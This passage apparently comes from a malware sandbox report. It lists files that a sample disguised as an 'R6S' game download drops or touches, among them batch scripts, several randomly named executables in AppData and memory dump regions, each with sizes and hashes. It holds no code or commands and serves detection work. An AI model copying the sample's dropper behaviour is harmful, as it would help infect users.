44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
39707b7265bbe2adef00d9915f61b4e9

SHA1
63437ea875211141e8b69df04783a940c6940fa5

SHA256
646c544310171e543923f41907c7163da352bb06facf281b0edf05e24104a892

SHA512
133b47657499283baf270ceb56818e0d0a949f704105af9cb56518ea76e5fea8748d80cb0f1afc33f1bf4b12ec51601cd96b71978a7b35b88296e599f374d450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8f4ed7eba3bac4eb195c5551f14d56b2

SHA1
cc16a81b5fcd7f580d77fea57b708a7e5383d623

SHA256
6397a343c6eb142b67e8fbc1f68546c2770505f27a067732fdbe5c1d7f822153

SHA512
72c8be1379d9f23993be54580f9a1ff98a1c7a312d63ef2552f6571d584e3ff9bc22d49280e99476c570ebd52aeb07e6e090b0b371adb005c7afc71a389715d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\DD02.tmp\DD03.tmp\DD04.bat
Filesize
6KB

MD5
45f6bf2d3c1c47e445439b805929aae8

SHA1
9d2ba518dd058559bc1d690019bbed79c7cd5f85

SHA256
ca7484221dd9645e4608a8195965d941955cfb0f9a373d0870cfd244302ae0fa

SHA512
902eb3e38b0be7d795f17a779d0231d0d168fbb8d4ce32b48ba3774a6be9929016b213e9b0082b55e8ac4d2fadadce3184ba8c30f8a025003fec8c8b8e496c64

Download Submit
C:\Users\Admin\AppData\Local\Temp\DDBD.tmp\DDBE.tmp\DDBF.bat
Filesize
1KB

MD5
2b49f09f8e1785bf2e5c79d0f2bc7389

SHA1
05d68482ab1db17e11fef25fae270c3b784000ae

SHA256
706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279

SHA512
ba8cc161086caa5beb691191ff10f1408e68be79a075d0a653716df497cec762b7767783a0dc91bcba2f260df0fa9ff77e9cf982a364135a18c281e50564bc0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l21tqemf.mk5.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs0.exe
Filesize
94KB

MD5
40208a80f2b2155185d8a5bac4b9c367

SHA1
d7bf694f6046be8d6a882c86df12c1a35e26ab60

SHA256
cf879d5a689376a47310ceb1b95167ccd18ab2073a1356b8d9cecbf04141ae16

SHA512
5ff32150c9e62261732c36b4bf2c4f84c58b120b72652b2c22a7591865dd6babbfb741fb75177acd845b072a4ea2a594960a894a2bca4f220c2f897ccd692621

Download Submit
C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs1.exe
Filesize
423KB

MD5
448e72d5b4a0ab039607cbaf93707732

SHA1
bbb85f7a6b8915d6a6739aa4f80be2766c62eb9f

SHA256
df97eb504ed5a3298737f83d418d70025f3be0daf56d6ccae35ec0d2ef813b20

SHA512
a4f82bb6385e1259e082128604e4232e2f0f3436d8fa8aa04ce3b0d42c943b8b3da4ffb74e307ba7243801b5b48ca07848cc8d029fc8a36cfb90e50ebaaba6a4

Download Submit
C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs2.exe
Filesize
5.2MB

MD5
f55fc8c32bee8f7b2253298f0a0012ba

SHA1
574c7a8f3eb378c03f58bc96252769296b20970e

SHA256
cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9

SHA512
c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a

Download Submit
C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs3.exe
Filesize
89KB

MD5
a3b2fcf0c05bb385115894d38c2e6c44

SHA1
32cf50911381bbec1dad6aec06c2a741bd5d8213

SHA256
dbfe02373aa15cc50414561f2bf486b69a11cd9cd50217608c1d18d17e72cae1

SHA512
fe58a5d238ac39a269897c176de08d0ad2726bb2ea1636f0d383a1484263e43d0878f0b5f4ebee8a10f3db8e72ab9b36b861e29a6a9b6429fa3e51ec7546dee2

Download Submit
C:\Users\Admin\Downloads\R6S.zip.crdownload
Filesize
10.1MB

MD5
9153734ad6cc322554efa2fedac3595f

SHA1
706eb1ee803a69f56c11152a16a1a6048c99b77c

SHA256
cdc745a7cbcdf4fbedd7fd9544f9754c5e75ed2f3ad6cb4e3b6a1ccb9f8c7cb5

SHA512
a4bc539cb8bf7c424367d342ccab116d9e26f885e22897b3da6f6b4e441f9e293105023fec9c323b21126523a437cbb316e4ceec5b8bf38ea57a834d21fe2a24

Download Submit
C:\Users\Admin\Downloads\R6S\r6s.exe
Filesize
7KB

MD5
b5e479d3926b22b59926050c29c4e761

SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24

SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8

Download Submit
\??\pipe\crashpad_3328_LEXDVHFCSIZOELKU
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/380-63-0x0000000000CE0000-0x0000000000CE8000-memory.dmp

Filesize
32KB

Download
memory/3672-214-0x0000000002C20000-0x0000000002C29000-memory.dmp

Filesize
36KB

Download
memory/3672-217-0x0000000004740000-0x0000000004B40000-memory.dmp

Filesize
4.0MB

Download
memory/3672-218-0x00007FFC8ED40000-0x00007FFC8EF1B000-memory.dmp

Filesize
1.9MB

Download
memory/3672-220-0x0000000074C90000-0x0000000074E52000-memory.dmp

Filesize
1.8MB

Download
memory/4312-144-0x0000000000C70000-0x0000000000CEE000-memory.dmp

Filesize
504KB

Download
memory/4312-209-0x0000000003140000-0x0000000003540000-memory.dmp

Filesize
4.0MB

Download
memory/4312-210-0x0000000003140000-0x0000000003540000-memory.dmp

Filesize
4.0MB

Download
memory/4312-211-0x00007FFC8ED40000-0x00007FFC8EF1B000-memory.dmp

Filesize
1.9MB

Download
memory/4312-213-0x0000000074C90000-0x0000000074E52000-memory.dmp

Filesize
1.8MB

Download
memory/4312-215-0x0000000000C70000-0x0000000000CEE000-memory.dmp

Filesize
504KB

Download
memory/4880-72-0x00000137EFE60000-0x00000137EFED6000-memory.dmp

Filesize
472KB

Download
memory/4880-69-0x00000137EFA50000-0x00000137EFA72000-memory.dmp

Filesize
136KB

Download